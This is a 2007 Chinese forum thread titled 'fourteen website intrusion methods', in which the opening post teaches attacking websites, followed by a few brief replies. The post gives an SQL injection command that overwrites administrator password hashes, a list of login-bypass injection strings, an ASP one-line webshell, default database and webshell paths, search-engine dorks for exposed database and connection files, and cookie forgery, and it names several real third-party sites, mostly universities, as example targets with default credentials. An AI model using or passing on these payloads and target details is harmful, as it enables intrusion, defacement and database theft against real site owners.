注册
登录
论坛
搜索
全国城市地图
帮助
导航
默认风格
宝石蓝
fervor
jeans
uchome
fashion
greenwall
私人消息 (0)
公共消息 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
IT家园
»
企业网管
» 十四种网站入侵方法
返回列表
发帖
amd64cpu2003
发短消息
加为好友
amd64cpu2003
当前离线
UID
31571
帖子
47
精华
0
积分
115
阅读权限
20
在线时间
11 小时
注册时间
2007-3-21
最后登录
2016-1-11
家园书生
帖子
47
积分
115
注册时间
2007-3-21
1
#
跳转到
»
倒序看帖
打印
字体大小:
t
T
发表于 2007-3-24 22:38
|
只看该作者
[分享]
十四种网站入侵方法
十四种网站入侵方法
1.上传漏洞[不多讲] pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了! 有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.
2.注入漏洞[不多讲] pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令: http://注入网址;update admin set password=’新MD5密码’ where password=’旧MD5密码’-- [admin为表名.]
3.旁注,也就是跨站. 我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了
4.暴库:把二级目录中间的/换成%5c EY:
http://www.ahttc.edu.cn/otherweb
... s.asp?BigClassName=职责范围&BigClassType=1 如果你能看到:’E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。 这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.
5.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有: ’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’a’=’a
6.社会工程学。这个我们都知道吧。就是猜解。 EY:
http://www.neu.edu.cn/waishi/admin
admin waishi
7.写入ASP格式数据库。就是一句话木马[〈%execute request("value")%〉 ],常用在留言本. EY:
http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp
[这个就是ASP格式的数据库],再写入一句话木马
8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改. EY:
http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
这个站用的是:杰出校友录,源码我下过了, 默认数据库/webshell路径:\database\liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin
9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL. /Databackup/dvbbs7.MDB /bbs/Databackup/dvbbs7.MDB /bbs/Data/dvbbs7.MDB /data/dvbbs7.mdb /bbs/diy.asp /diy.asp /bbs/cmd.asp /bbs/cmd.exe /bbs/s-u.exe /bbs/servu.exe 工具:网站猎手 挖掘鸡 EY:
http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB
10.查看目录法:人一些网站可以断开目录,可以方问目录。 EY:
http://www.ujs168.com/shop/admin/
http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/
这样我们可以找到数据库,下载不用我教吧
11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的WEBSHELL]
12.搜索引擎利用: (1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/ (2).找网站的管理后台地址: site:xxxx.comintext:管理 site:xxxx.comintitle:管理 〈关键字很多,自已找〉 site:xxxx.cominurl:login (3).查找access的数据库,mssql、mysql的连接文件 allinurl:bbsdata filetype:mdbinurl:database filetype:incconn inurl:datafiletype:mdb 我主不做了。。自已做做吧。。
13.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。这个我就不多讲了
14.利用常见的漏洞:如动网BBS EY:
http://js1011.com/bbs/index.asp
可以先用:dvbbs权限提升工具,使自已成为前台管理员。 THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包 这个我就不做了,网上教程多的是,自已下个看看。 工具:dvbbs权限提升工具 动网固顶贴工具
收藏
分享
ufo700
发短消息
加为好友
ufo700
当前离线
UID
20588
帖子
242
精华
0
积分
397
阅读权限
30
在线时间
83 小时
注册时间
2006-12-18
最后登录
2010-1-24
家园秀才
帖子
242
积分
397
注册时间
2006-12-18
2
#
发表于 2007-3-25 09:32
|
只看该作者
好深傲哦,看的晕忽忽的。
咬着嘴里的,夹着碗里的,盯着着锅里的,想着菜市场里的,惦记着田里的……
TOP
幽冥雪狼
发短消息
加为好友
幽冥雪狼
当前离线
UID
26708
帖子
23
精华
0
积分
24
阅读权限
10
在线时间
0 小时
注册时间
2007-2-22
最后登录
2008-1-5
家园新手
帖子
23
积分
24
注册时间
2007-2-22
3
#
发表于 2007-3-25 11:42
|
只看该作者
俺只知道漏洞攻击这个比较常用!
TOP
沙罗双树园
发短消息
加为好友
沙罗双树园
当前离线
UID
28921
帖子
79
精华
0
积分
188
阅读权限
20
在线时间
27 小时
注册时间
2007-3-13
最后登录
2007-4-9
家园书生
帖子
79
积分
188
注册时间
2007-3-13
4
#
发表于 2007-3-26 14:09
|
只看该作者
老技术了,不过有时也挺有效
国人安全意识还是太淡薄
无心呢喃
TOP
cjz798
发短消息
加为好友
cjz798
当前离线
UID
17188
帖子
78
精华
0
积分
184
阅读权限
20
在线时间
53 小时
注册时间
2006-11-13
最后登录
2013-7-16
家园书生
帖子
78
积分
184
注册时间
2006-11-13
5
#
发表于 2007-4-14 01:26
|
只看该作者
这个数据库安全方面确实是一点都不懂
TOP
返回列表
外语学习
音乐天地
社区交易
自然风光
每日综合
艺术天地
桌面美化
供求信息
音画专区
E书专区
[收藏此主题]
[关注此主题的新回复]
[通过 QQ、MSN 分享给朋友]